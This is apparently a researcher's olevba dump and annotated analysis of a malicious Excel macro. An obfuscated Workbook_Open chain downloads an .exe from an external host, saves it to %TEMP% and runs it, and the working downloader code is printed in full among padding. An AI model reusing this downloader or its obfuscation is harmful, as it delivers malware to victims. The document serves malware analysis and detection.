dynamoo

Malicious Excel macro

Oct 5th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V 216116.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 216116.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ЭтаКнига.cls
  13. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
      ' Auto-exec entry point (olevba: AutoExec / Workbook_Open): runs as soon
      ' as the workbook is opened with macros enabled. Its only statement hands
      ' off to SSVEvdqwfF3 in this module; the literal 77 is never read there.
  16.    
  17.  
  18. SSVEvdqwfF3 (77)
  19.  
  20. End Sub
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27. Sub SSVEvdqwfF3(FFFFF As Integer)
      ' Second hop of the execution chain. FFFFF is unused; the body only calls
      ' ValidateAmountOf5 (Module2), the download-and-execute routine.
  28. ValidateAmountOf5
  29.  
  30. End Sub
  31.  
  32.  
  33.  
  34. -------------------------------------------------------------------------------
  35. VBA MACRO Лист1.cls
  36. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. (empty macro)
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Лист2.cls
  41. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Лист3.cls
  46. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. (empty macro)
  49. -------------------------------------------------------------------------------
  50. VBA MACRO Module1.bas
  51. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  52. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  53.  
  54.  
  55. Function OpenIL_TypeString(ByVal il_const As Boolean) As String
      ' Maps an OpenIL (DevIL) pixel-type constant to its name.
      ' NOTE(review): written in PowerBASIC dialect (%equates, "Function ="),
      ' not VBA; never referenced from the Workbook_Open call chain, so this
      ' looks like pasted filler meant to pad out the module.
  56.  
  57.     Select Case il_const
  58.         Case %IL_BYTE : Function = "IL_BYTE"
  59.         Case %IL_UNSIGNED_BYTE : Function = "IL_UNSIGNED_BYTE"
  60.         Case %IL_SHORT : Function = "IL_SHORT"
  61.         Case %IL_UNSIGNED_SHORT : Function = "IL_UNSIGNED_SHORT"
  62.         Case %IL_INT : Function = "IL_INT"
  63.         Case %IL_UNSIGNED_INT : Function = "IL_UNSIGNED_INT"
  64.         Case %IL_FLOAT : Function = "IL_FLOAT"
  65.         Case %GL_DOUBLE : Function = "GL_DOUBLE"
  66.  
  67.         Case Else : Function = "Type not defined"
  68.  
  69.  
  70.     End Select
  71.  
  72. End Function
  73.  
  74.  
  75.  
  76. Function OpenIL_FormatString(ByVal il_const As Boolean) As String
      ' Maps an OpenIL pixel-format constant to its name. NOTE(review): same
      ' PowerBASIC dialect as OpenIL_TypeString and equally unreferenced from
      ' the Workbook_Open chain — filler.
  77.  
  78.     Select Case il_const
  79.         Case %IL_COLOUR_INDEX : Function = "IL_COLOUR_INDEX"
  80.         Case %IL_COLOR_INDEX : Function = "IL_COLOR_INDEX"
  81.         Case %IL_RGB : Function = "IL_RGB"
  82.         Case %IL_RGBA : Function = "IL_RGBA"
  83.         Case %IL_BGR : Function = "IL_BGR"
  84.         Case %IL_BGRA : Function = "IL_BGRA"
  85.         Case %IL_LUMINANCE : Function = "IL_LUMINANCE"
  86.  
  87.         Case Else : Function = "Format not defined"
  88.  
  89.  
  90.     End Select
  91.  
  92. End Function
  93.  
  94.  
  95.  
  96. Function OpenIL_OriginString(ByVal il_const As Boolean) As String
      ' Maps an OpenIL origin constant to its name. NOTE(review): PowerBASIC
      ' dialect, not VBA; unreferenced from the Workbook_Open chain — filler.
  97.  
  98.     ' Origin Definitions
  99.    Select Case il_const
  100.         Case %IL_ORIGIN_LOWER_LEFT : Function = "IL_ORIGIN_LOWER_LEFT"
  101.         Case %IL_ORIGIN_UPPER_LEFT : Function = "IL_ORIGIN_UPPER_LEFT"
  102.  
  103.         Case Else : Function = "Origin type not defined"
  104.     End Select
  105.  
  106. End Function
  107.  
  108.  
  109.  
  110. Public Function OpenIL8PalTypeString(KJB As Long)
      ' Download stage. KJB is unused. The Chr()-built string decodes to
      ' "Microsoft.XMLHTTP" (see olevba's "VBA string" table); TextBoxAsValidate
      ' instantiates it with CreateObject, ProfileChr (Module3) opens the GET
      ' request to the download URL, .Send performs it synchronously, and the
      ' raw responseBody — the payload bytes — is returned as a Variant to the
      ' caller, which writes them to disk. No status code is checked.
  111.  
  112. Dim PbMain31 As Object
  113. Set PbMain31 = TextBoxAsValidate(Chr(77) & Chr(105) & "c" & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & Chr(76) & "H" & Chr(84) & Chr(84) & "P")
  114. ProfileChr PbMain31
  115. PbMain31.Send
  116. OpenIL8PalTypeString = PbMain31.responseBody
  117. End Function
  118.  
  119. Function OpenIL_PalTypeString(ByVal il_const As Boolean) As String
      ' Maps an OpenIL palette-type constant to its name. NOTE(review):
      ' PowerBASIC dialect, not VBA; unreferenced from the Workbook_Open chain.
      ' Not to be confused with OpenIL8PalTypeString above, which is the
      ' downloader and merely borrows this name.
  120.  
  121.     ' Palette types
  122.    Select Case il_const
  123.         Case %IL_PAL_NONE : Function = "IL_PAL_NONE"
  124.         Case %IL_PAL_RGB24 : Function = "IL_PAL_RGB24"
  125.         Case %IL_PAL_RGB32 : Function = "IL_PAL_RGB32"
  126.         Case %IL_PAL_RGBA32 : Function = "IL_PAL_RGBA32"
  127.         Case %IL_PAL_BGR24 : Function = "IL_PAL_BGR24"
  128.         Case %IL_PAL_BGR32 : Function = "IL_PAL_BGR32"
  129.         Case %IL_PAL_BGRA32 : Function = "IL_PAL_BGRA32"
  130.  
  131.         Case Else : Function = "Pallete type not defined"
  132.     End Select
  133.  
  134. End Function
  135.  
  136.   Public Function Profile8Exists(AquaBarb2 As String, AquaBarb3 As String, AquaBarb As Object, GetDesktopMPath_3 As String, GetDesktopMPath_8 As Double) As Double
      ' Pass-through to Create_Shortcut: only AquaBarb (the ADODB.Stream holding
      ' the downloaded bytes) and GetDesktopMPath_3 (destination path) are used;
      ' AquaBarb2, AquaBarb3 and GetDesktopMPath_8 are padding. The 77.8 and
      ' Create_Shortcut assignments are dead stores, so on normal completion the
      ' result is 72.99, which the caller stores in HricK and never reads.
  137. Profile8Exists = 77.8
  138. Profile8Exists = Create_Shortcut(AquaBarb, GetDesktopMPath_3)
  139. Profile8Exists = 72.99
  140.   End Function
  141.  
  142. Function PbMain() As Long
      ' Main routine of a PowerBASIC command-line image-info tool (the usage
      ' message names it imginfo.exe, which is where olevba's imginfo.exe IOC
      ' comes from). Local/Dword/Asciiz, Command$ and $CRLF are PowerBASIC, not
      ' VBA, and nothing on the Workbook_Open path calls it — filler, not payload.
  143.  
  144.     Local ILErr As Dword
  145.     Local info As  ILinfo
  146.     Local ID As Dword
  147.     Local errString As Asciiz*1024
  148.  
  149.  
  150.     If Len(Command$) = 0 Then
  151.         MsgBox "Usage: imginfo.exe filename"
  152.         Exit Function
  153.     End If
  154.  
  155.     ilInit
  156.  
  157.     ilGenImages ByVal 1, ID
  158.     ILErr = ilGetError()
  159.     If ILErr <> 0 Then
  160.             errString = iluErrorString(ILErr)
  161.             MsgBox "Error in ilGenImages" & $CRLF &  errString
  162.             Exit Function
  163.     End If
  164.  
  165.  
  166.     ilBindImage ID
  167.     ILErr = ilGetError()
  168.     If ILErr <> 0 Then
  169.             errString = iluErrorString(ILErr)
  170.             MsgBox "Error in ilBindImage" & $CRLF &  errString
  171.             GoTo done
  172.     End If
  173.  
  174.  
  175.  
  176.    ' ilEnable %IL_FORMAT_SET
  177.   ' ilEnable %IL_ORIGIN_SET
  178.   ' ilEnable %IL_TYPE_SET
  179.   '
  180.   ' ilFormatFunc %IL_RGB
  181.   ' ilOriginFunc %IL_ORIGIN_LOWER_LEFT
  182.   ' ilTypeFunc %IL_UNSIGNED_BYTE
  183.   '
  184.   ' ilEnable %IL_CONV_PAL
  185.   ' Do
  186.   '     ILErr = ilGetError()
  187.   ' Loop While (ILErr <> 0)
  188.  
  189.  
  190.  
  191.  
  192.  
  193.     ilLoadImage Command$
  194.     ILErr = ilGetError()
  195.     If ILErr <> 0 Then
  196.             errString = iluErrorString(ILErr)
  197.             GoTo done
  198.     End If
  199.  
  200.  
  201.     iluGetImageInfo info
  202.     ILErr = ilGetError()
  203.     If ILErr <> 0 Then
  204.             errString = iluErrorString(ILErr)
  205.             GoTo done
  206.     Else
  207.  
  208.  
  209.     End If
  210.  
  211. done:
      ' Shared cleanup: release the image, then drain the DevIL error queue.
  212.     ilDeleteImages 1, ID
  213.  
  214.     ' clear additional errors
  215.    Do
  216.         ILErr = ilGetError()
  217.     Loop While (ILErr <> 0)
  218.  
  219.  
  220. End Function
  221. Public Function Create_Shortcut(GetDesktopMPath_4 As Object, GetDesktopMPath_3 As String) As Integer
      ' Drop stage: GetDesktopMPath_4 is the ADODB.Stream filled with the HTTP
      ' response body; SaveToFile writes it to GetDesktopMPath_3 (%TEMP%\zzA.exe,
      ' built by the caller) with option 2 (adSaveCreateOverWrite). The 15 and 2
      ' assignments are dead stores, and the name has nothing to do with
      ' shortcuts — it is camouflage.
  222. Create_Shortcut = 15
  223. GetDesktopMPath_4.savetofile GetDesktopMPath_3, 2
  224. Create_Shortcut = 2
  225. End Function
  226.  
  227.  
  228. -------------------------------------------------------------------------------
  229. VBA MACRO Module2.bas
  230. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  231. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  232.  
  233.  
  234. Public Const QUOTE = "'"
  235. Public Const QUOTE2 = "''"
  236. Public Const DOUBLE_QUOTE = """"
  237.  
  238. Public Const NUMERIC_KEYS = "-01234567890."
      ' Single-quote, doubled-quote and double-quote literals plus the key set
      ' accepted by NumericFilter. Used only by the benign helpers of this
      ' module (QuotedSymbol, ValidStockSymbol, NumericFilter); none of them is
      ' on the Workbook_Open path.
  239.  
  240. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  241. '
  242. Public Function Max(ByVal a As Variant, ByVal b As Variant) As Variant
      ' Returns the larger of a and b (b when equal). Generic VB6 helper;
      ' nothing on the Workbook_Open path calls it.
  243.     If a > b Then
  244.         Max = a
  245.     Else
  246.         Max = b
  247.     End If
  248. End Function
  249.  
  250. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  251. '
  252. Public Function Min(ByVal a As Variant, ByVal b As Variant) As Variant
      ' Returns the smaller of a and b (b when equal). Generic VB6 helper;
      ' nothing on the Workbook_Open path calls it.
  253.     If a < b Then
  254.         Min = a
  255.     Else
  256.         Min = b
  257.     End If
  258. End Function
  259.  
  260. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  261. '
  262. Public Function Between(ByVal a As Variant, ByVal b As Variant, ByVal c As Variant) As Variant
      ' Clamps a to the closed range [b, c]: returns b when a < b, c when a > c,
      ' otherwise a. Not called from the Workbook_Open path.
  263.     If a < b Then
  264.         Between = b
  265.     ElseIf a > c Then
  266.         Between = c
  267.     Else
  268.         Between = a
  269.     End If
  270. End Function
  271.  
  272. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  273. '
  274. Public Function DBRead(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
      ' Substitutes NullValue for a database Null, otherwise returns V unchanged.
      ' Any error is silently ignored (On Error Resume Next). Not on the
      ' Workbook_Open path.
  275.     On Error Resume Next
  276.     DBRead = IIf(IsNull(V), NullValue, V)
  277. End Function
  278.  
  279. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  280. '
  281. Public Function DBWrite(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
      ' Inverse of DBRead: maps the sentinel NullValue back to Null, otherwise
      ' returns V. On Error Resume Next hides a failing comparison (presumably
      ' a Null V), in which case the function returns Empty. Not on the
      ' Workbook_Open path.
  282.     On Error Resume Next
  283.     DBWrite = IIf(V = NullValue, Null, V)
  284. End Function
  285.  
  286. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  287. ' Converts Symbol to form acceptable by Sql syntax
  288. ' AGR'A -> 'AGR''A'
  289. '
  290. Public Function QuotedSymbol(ByVal Symbol As String) As String
      ' Wraps Symbol in single quotes and doubles any embedded single quote —
      ' the SQL string-literal escaping described in the header comment above.
      ' Not on the Workbook_Open path.
  291.     QuotedSymbol = QUOTE & Replace(Symbol, QUOTE, QUOTE2) & QUOTE
  292. End Function
  293.  
  294. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  295. ' Converts Symbol to standard form
  296. ' AGR''A -> AGR'A
  297. ' AGR"A -> AGR'A
  298. '
  299. Public Sub ValidStockSymbol(Symbol As String)
      ' Normalises Symbol in place (ByRef): collapses doubled single quotes and
      ' turns double quotes into single quotes. Not on the Workbook_Open path.
  300.     Symbol = Replace(Symbol, QUOTE2, QUOTE)
  301.     Symbol = Replace(Symbol, DOUBLE_QUOTE, QUOTE)
  302. End Sub
  303.  
  304. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  305. '
  306. Public Sub NumericFilter(KeyAscii As Integer)
      ' KeyPress filter: zeroes KeyAscii (suppressing the keystroke) for any
      ' printable character not found in NUMERIC_KEYS; control codes (<= 31)
      ' pass through. Not on the Workbook_Open path.
  307.     If KeyAscii > 31 Then
  308.         If InStr(NUMERIC_KEYS, Chr$(KeyAscii)) = 0 Then
  309.             KeyAscii = 0
  310.         End If
  311.     End If
  312. End Sub
  313.  
  314. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  315. ' CURRENCY 8 bytes
  316. ' A scaled integer between
  317. '   – 922,337,203,685,477.5808
  318. ' and 922,337,203,685,477.5807
  319. '
  320. ' We restrict it to be
  321. ' - positive
  322. ' - integer i.e. no fractions
  323. ' - not more than 14 symbols
  324. ' so it can be from 1 to 99 999 999 999 999
  325. '
  326. Public Function ValidateCurrency(TC As Boolean) As Currency
      ' Textbox-validation routine from the same VB6 source as ValidateString:
      ' restricts the text to a positive integer of at most 14 digits, then
      ' converts it with CCur, falling back to 0 (and clearing the box).
      ' NOTE(review): `a` and `c` are not declared anywhere visible and TC is a
      ' Boolean, so the a.TC / c.TC member accesses cannot work as written and
      ' On Error Resume Next swallows the failure. Filler; not on the
      ' Workbook_Open path.
  327. Dim S As String
  328. Dim i As Long
  329.     On Error Resume Next
  330.     '////////////////////////
  331.    ' Restrict user input '/
  332.    '//////////////////////
  333.    With a.TC
  334.         i = .SelStart
  335.         S = ValidateString(.Text, False, False, False, 14, 0)
  336.         .Text = S
  337.         .SelStart = i
  338.     End With
  339.     '///////////////////////
  340.    ' Convert user input '/
  341.    '/////////////////////
  342.    On Error GoTo Fail
  343.     ValidateCurrency = CCur(a.TC.Text)
  344.     Exit Function
  345. Fail:
  346.     On Error Resume Next
  347.     c.TC.Text = ""
  348.     ValidateCurrency = 0
  349. End Function
  350.  
  351. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  352. '
  353. Public Function ValidatePrice(TC As Boolean) As Double
      ' Filters a textbox through ValidateString (no negatives, no leading zero,
      ' fractions allowed, at most 10 characters, capped at 1e9) and returns
      ' Val() of the result, preserving the caret position.
      ' NOTE(review): `c` is undeclared here as in ValidateCurrency; filler,
      ' not on the Workbook_Open path.
  354. Dim S As String
  355. Dim i As Long
  356.     On Error Resume Next
  357.     With c.TC
  358.         ' Validating UserInput
  359.        i = .SelStart
  360.         S = ValidateString(.Text, False, False, True, 10, 1000000000)
  361. '        s = VBCleanEntry(.Text, ".", 2)
  362.        .Text = S
  363.         .SelStart = i
  364.         ValidatePrice = Val(.Text)
  365.     End With
  366. End Function
  367. Public Function ValidateAmountOf5()
      ' Download-and-execute routine reached from Workbook_Open via SSVEvdqwfF3.
      ' Every COM ProgID is assembled from Chr() pieces; the decoded values are
      ' the ones olevba prints in its "VBA string" table:
      '   - WScript.Shell .Environment("Process")("TEMP") -> %TEMP% directory
      '   - Adodb.Stream (Type = 1, binary) receives the bytes returned by
      '     OpenIL8PalTypeString (the HTTP response body); its argument 223 is
      '     ignored by the callee
      '   - Profile8Exists / Create_Shortcut save the stream as %TEMP%\zzA.exe
      '   - ";<=Shell.Application" is reduced to "Shell.Application" by
      '     TextBoxAsValidate, and .Open launches the dropped file.
      ' ValidatePriceAndString, GetDesktopMPath_2 and noexile are undeclared
      ' (implicit Variants); HricK receives a return value that is never read.
      ' Detection: Excel instantiating MSXML, ADODB.Stream and Shell.Application
      ' and then writing and opening an .exe under %TEMP% is the observable
      ' behaviour of this chain.
  368. Set ValidatePriceAndString = TextBoxAsValidate(Chr(87) & Chr(80 + 3) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) + Chr(23 * 2) & Chr(40 * 2 + 3) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  369. GetDesktopMPath_2 = ValidatePriceAndString("T" & Chr(69) & Chr(77) & Chr(80))
  370. Dim AquaBarb As Object
  371. Set AquaBarb = TextBoxAsValidate(Chr(65) & "do" & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & "a" & Chr(109))
  372. Dim GetDesktopMPath_3 As String
  373. GetDesktopMPath_3 = GetDesktopMPath_2 & "\" & "zz" & Chr(65) & "." & "e" & Chr(120) & "e"
  374. With AquaBarb
  375.    .Type = 1
  376.     .Open
  377.     .write OpenIL8PalTypeString(223)
  378.    
  379. End With
  380.  Dim HricK As Double
  381. HricK = Profile8Exists("AquaBarb", "AquaBarb", AquaBarb, GetDesktopMPath_3, 88.3)
  382. Set noexile = TextBoxAsValidate(";<=" + Chr(83) & "h" & "e" & Chr(108) & Chr(108) & Chr(46) & Chr(65) & "p" & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  383. noexile.Open (GetDesktopMPath_3)
  384. End Function
  385. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  386. '
  387. Public Function ValidateAmount(TC As Boolean) As Long
      ' Same pattern as ValidatePrice but for whole numbers: ValidateString with
      ' fractions disallowed, at most 10 characters, capped at 1e9; returns
      ' Val() of the filtered text. NOTE(review): `c` is undeclared in anything
      ' visible; filler, not on the Workbook_Open path.
  388.     Dim S As String
  389.     Dim i As Long
  390.    
  391.     On Error Resume Next
  392.     With c.TC
  393.         ' Validating UserInput
  394.        i = .SelStart
  395.         S = ValidateString(.Text, False, False, False, 10, 1000000000)
  396. '        s = VBCleanEntry(.Text, ".", 2)
  397.        .Text = S
  398.         .SelStart = i
  399.         ValidateAmount = Val(.Text)
  400.     End With
  401. End Function
  402.  
  403. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  404. '
  405. Public Function ValidatePercent(TC As Boolean) As Double
      ' Percent-field filter: ValidateString with zero and fractions allowed,
      ' no negatives, at most 6 characters, capped at 100; the fractional part
      ' is then truncated to two digits before the text is written back and
      ' Val() of it returned. NOTE(review): `c` is undeclared in anything
      ' visible; filler, not on the Workbook_Open path.
  406. Dim S As String
  407. Dim i As Long
  408.     On Error Resume Next
  409.     With c.TC
  410.         i = .SelStart
  411.         S = ValidateString(.Text, False, True, True, 6, 100)
  412.         Dim j As Long
  413.         j = InStr(S, ".")
  414.         If j > 0 Then
  415.             Dim f As String
  416.             Dim g As String
  417.             f = Mid(S, j + 1)
  418.             If Len(f) > 2 Then
  419.                 f = Left(f, 2)
  420.             End If
  421.             g = Left(S, j - 1)
  422.             S = g & "." & f
  423.         End If
  424.         .Text = S
  425.         .SelStart = i
  426.         ValidatePercent = Val(.Text)
  427.     End With
  428. End Function
  429.  
  430. '   -------------------------------------------------------------
  431. '   function validates parsed string
  432. '   Use it on Change Event
  433. '   © 2000 Dmitry Grechishkin, grechishkin@egartech.com
  434.  
    Public Function ValidateString( _
                            strInputString As String, _
                            blnAllowNegative As Boolean, _
                            blnAllowZero As Boolean, _
                            blnAllowFractions As Boolean, _
                            Optional lngMaxLen As Long = 0, _
                            Optional lngMaxValue As Long = 0 _
                            ) As String
      ' Character-by-character numeric input filter (header comment above).
      ' Walks the trimmed string once; each position is either kept (digit, a
      ' leading "-" if allowed, a single "." if fractions are allowed) or cut
      ' out. Exceeding lngMaxValue / lngMaxLen jumps to EX and returns the
      ' truncated string. Benign VB6 library code shared by the Validate*
      ' routines; not on the Workbook_Open path.
   
  444.     Dim strTmpValue  As String
  445.     Dim strCurrentSymbol  As String
  446.     Dim strLeftStroke As String
  447.     Dim strRightStroke As String
  448.     Dim lngLenght As Long
  449.     Dim lngDotPosition As Long
  450.     Dim blnInvalidSymbol As Boolean
  451.     Dim blnCorrectDot  As Boolean
  452.    
  453.     Dim i As Long
  454.     Dim j As Long
  455.    
  456.     On Error Resume Next
  457.    
  458.     strTmpValue = Trim$(strInputString)
  459.     lngLenght = Len(strTmpValue)
  460.    
  461.     If lngLenght > 0 Then
  462. '   ---------------------
  463. '       Validates user input independently from locals and uses ',' or '.' as decimal separator
  464.        For i = 1 To lngLenght
  465.         blnInvalidSymbol = True
  466. '
      ' Mid$ on the left-hand side overwrites one character in place: "," -> "."
  467.        If blnAllowFractions And (Mid$(strTmpValue, i, 1) = ",") Then
  468.             Mid$(strTmpValue, i, 1) = "."
  469.         End If
  470.        
  471.         strCurrentSymbol = Mid$(strTmpValue, i, 1)
  472. '            Truncates value if it exeeds max value
  473.             If lngMaxValue > 0 Then
  474.                 If Abs(Val(strTmpValue)) > lngMaxValue Then
  475.                     strTmpValue = Left$(strTmpValue, lngLenght - 1)
  476.                     blnInvalidSymbol = True
  477.                     GoTo EX
  478.                 End If
  479.              End If
  480.              If lngMaxLen > 0 Then
  481. '            If negative values are allowed to be inputted
  482.                If Len(Trim$(Replace(strTmpValue, "-", " "))) > lngMaxLen Then
  483.                     strTmpValue = Left$(strTmpValue, lngMaxLen)
  484.                     blnInvalidSymbol = True
  485.                     GoTo EX
  486.                 End If
  487.              End If
  488.              
  489.              
  490.             If i = 1 Then
  491.                 If blnAllowNegative And (strCurrentSymbol = "-") Then
  492.                     blnInvalidSymbol = False
  493.                     GoTo Check
  494.                 End If
  495. '               if zero values are allowed to input
  496.                If Not blnAllowZero And (strCurrentSymbol = "0") Then
  497.                     blnInvalidSymbol = True
  498.                     GoTo Check
  499.                 End If
  500.             End If
  501.  
  502. '               --------------------------
  503. '               numeric validation
  504.                For j = 0 To 9
  505.                     If strCurrentSymbol = Trim$(str$(j)) Then
  506.                         blnInvalidSymbol = False
  507.                         GoTo Check
  508.                     End If
  509.                 Next
  510. '               --------------------------
  511. '            decimal separator is single in string
      ' lngDotPosition remembers the first accepted "."; any later "." at a
      ' different index is treated as invalid and removed.
  512.             If (lngDotPosition > 0) Then
  513.                 If (lngDotPosition = i) Then
  514.                     blnCorrectDot = True
  515.                 Else
  516.                     blnCorrectDot = False
  517.                 End If
  518.              Else
  519.                     blnCorrectDot = True
  520.              End If
  521.              
  522.              If blnAllowFractions And (strCurrentSymbol = ".") And blnCorrectDot Then
  523.                 blnInvalidSymbol = False
  524.                 lngDotPosition = i
  525.                 GoTo Check
  526.              End If
  527.  
  528. Check:
  529. '   If any invalid symbol is found, cut it away
  530.    If blnInvalidSymbol Then
  531.         strLeftStroke = Left$(strTmpValue, i - 1)
  532.         strRightStroke = Right$(strTmpValue, lngLenght - i)
  533.         strTmpValue = strLeftStroke + strRightStroke
  534.     End If
  535.         Next
  536. '   ---------------------
  537. EX:
  538.      ValidateString = strTmpValue
  539.    
  540.     End If
  541.     On Error GoTo 0
  542. End Function
  543.  
  544.  
  545. -------------------------------------------------------------------------------
  546. VBA MACRO Module3.bas
  547. in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  548. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  549.  
  550. Public Sub InitGDIPlus()
      ' GDI+ start-up wrapper from a VB6 imaging library, pasted in as filler:
      ' mToken, c.uInput and c.GdiplusStartup are not declared anywhere visible,
      ' and the "?????" in the MsgBox arguments are characters lost to encoding
      ' in the original (presumably non-Latin text) — left exactly as extracted.
      ' On failure `End` terminates the host outright. Not reachable from the
      ' Workbook_Open chain.
  551.     Dim uInput As Boolean
  552.     If mToken <> 0 Then Exit Sub
  553.     c.uInput.GdiplusVersion = 1
  554.     If c.GdiplusStartup(mToken, uInput) <> 0 Then
  555.         MsgBox "GDI+ ?????????????", vbCritical, "?????"
  556.         End
  557.     End If
  558. End Sub
  559.  
  560. Public Sub TerminateGDIPlus()
      ' Counterpart of InitGDIPlus: shuts GDI+ down if a token was obtained.
      ' mToken and c are undeclared in anything visible; filler, not on the
      ' Workbook_Open path.
  561.     If mToken = 0 Then Exit Sub
  562.     c.GdiplusShutdown mToken
  563. End Sub
  564.  
  565. Public Function GetImageEncoderClsid(ByVal ImageType As Boolean) As Boolean
      ' Fills the return value with the PNG or JPG encoder CLSID through
      ' CLSIDFromString. NOTE(review): a Boolean cannot hold a CLSID, and PNG,
      ' JPG, ImageEncoderPNG/JPG and c are undeclared here — the declarations of
      ' the original library were not pasted along. Filler, not on the
      ' Workbook_Open path.
  566.     Select Case ImageType
  567.         Case PNG: c.CLSIDFromString StrPtr(ImageEncoderPNG), GetImageEncoderClsid
  568.         Case JPG: c.CLSIDFromString StrPtr(ImageEncoderJPG), GetImageEncoderClsid
  569.     End Select
  570. End Function
  571.  
  572. Public Function ProfileChr(KJB As Object)
      ' Prepares the HTTP request on the XMLHTTP object passed as KJB. segR
      ' decodes to the download host http://agridiotiko[.]com and the Open call
      ' decodes to GET "/432/4535.exe" (both appear in olevba's IOC table); the
      ' trailing False makes the request synchronous, so the caller's .Send
      ' blocks until the body has arrived. Nothing is returned.
  573. Dim segR As String
  574. segR = Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(97) & Chr(103) & "r" & Chr(105) & "d" & "i" & Chr(111) & Chr(116) & "i" & "k" & "o" & Chr(46) & "c" & Chr(111) & "m"
  575. KJB.Open Chr(71) & "E" & Chr(84), segR & "/" & Chr(52) & "3" & Chr(50) & Chr(47) & "4" & Chr(53) & Chr(51) & Chr(53) & Chr(46) & "e" & Chr(120) & "e", False
  576. End Function
  577. Public Function TextBoxAsValidate(SmRaNdMM1 As String)
      ' Obfuscation wrapper around CreateObject. The loop strips the four
      ' characters Chr(59)..Chr(62) — ";", "<", "=", ">" (20 * 3 - 1 = 59) —
      ' from the ProgID, so ";<=Shell.Application" becomes "Shell.Application"
      ' while undecorated ProgIDs pass through unchanged. The loop counter i is
      ' undeclared. Returns the created COM object.
  578. For i = 0 To 3
  579. SmRaNdMM1 = Replace(SmRaNdMM1, Chr(i + 20 * 3 - 1), "")
  580. Next i
  581.  Set TextBoxAsValidate = CreateObject(SmRaNdMM1)
  582. End Function
  583. Public Function SavePicToPNG(ByVal Pic As Long, ByVal Path As String) As Long
      ' GDI+ save wrapper: copies an EncoderParameters struct into a byte buffer,
      ' wraps the HBITMAP Pic as a GDI+ image, saves it to Path with the PNG
      ' encoder and disposes the image. EncoderParameters, CopyMemory and the
      ' Gdip* declarations live outside this listing. Filler, not on the
      ' Workbook_Open path.
  584.     Dim Params As EncoderParameters, EncParams() As Byte, Image As Long
  585.     Params.Count = 1
  586.     ReDim EncParams(Len(Params) - 1)
  587.     CopyMemory EncParams(0), Params, Len(Params)
  588.     GdipCreateBitmapFromHBITMAP Pic, 0, Image
  589.     SavePicToPNG = GdipSaveImageToFile(Image, StrPtr(Path), GetImageEncoderClsid(PNG), EncParams(0))
  590.     GdipDisposeImage Image
  591.     Erase EncParams
  592. End Function
  593.  
  594. Public Function SavePicToJPG(ByVal Pic As Long, ByVal Path As String, ByVal Quality As Long) As Long
      ' JPEG variant of SavePicToPNG: fills one EncoderParameter (the quality
      ' setting, passed by pointer via VarPtr) before saving with the JPG
      ' encoder. Same external declarations as SavePicToPNG are assumed.
      ' Filler, not on the Workbook_Open path.
  595.     Dim Params As EncoderParameters, EncParams() As Byte, Image As Long
  596.    
  597.     Params.Count = 1
  598.     CLSIDFromString StrPtr(EncoderQuality), Params.Parameter.GUID
  599.     Params.Parameter.NumberOfValues = 1
  600.     Params.Parameter.Type = 4
  601.     Params.Parameter.Value = VarPtr(Quality)
